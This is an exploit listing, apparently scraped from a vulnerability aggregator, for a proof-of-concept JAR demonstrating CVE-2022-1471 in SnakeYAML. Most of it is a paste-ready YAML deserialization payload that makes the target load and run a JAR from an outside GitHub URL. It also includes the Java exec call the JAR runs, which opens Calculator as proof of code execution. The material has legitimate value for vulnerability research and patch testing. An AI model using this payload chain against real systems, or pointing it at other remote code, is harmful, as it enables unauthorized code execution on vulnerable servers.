## https://sploitus.com/exploit?id=9249226C-A7B2-58E2-8CE2-1026EA47A077
# yaml-payload
Exploit payload JAR for demonstrating [CVE-2022-1471](https://vulners.com/cve/CVE-2022-1471) (SnakeYAML arbitrary code execution).
When loaded via SnakeYAML's `!!` type tag deserialization, this JAR opens Calculator on macOS as proof of Remote Code Execution.
## Usage
Paste into any input field parsed by vulnerable SnakeYAML (`yaml.load()`):
```
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sec-demo-2/yaml-payload/main/yaml-payload.jar"]]]]
```
## How it works
The JAR implements `javax.script.ScriptEngineFactory`. When `ScriptEngineManager` is instantiated with a `URLClassLoader` pointing to this JAR, it uses Java's `ServiceLoader` to discover and instantiate the factory class, which runs:
```java
Runtime.getRuntime().exec(new String[]{"open", "-a", "Calculator"});
```
## Source
See [src/artsploit/AwesomeScriptEngineFactory.java](src/artsploit/AwesomeScriptEngineFactory.java) for the full source code.
Based on the [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) research project, modified to use `open -a Calculator` for modern macOS compatibility.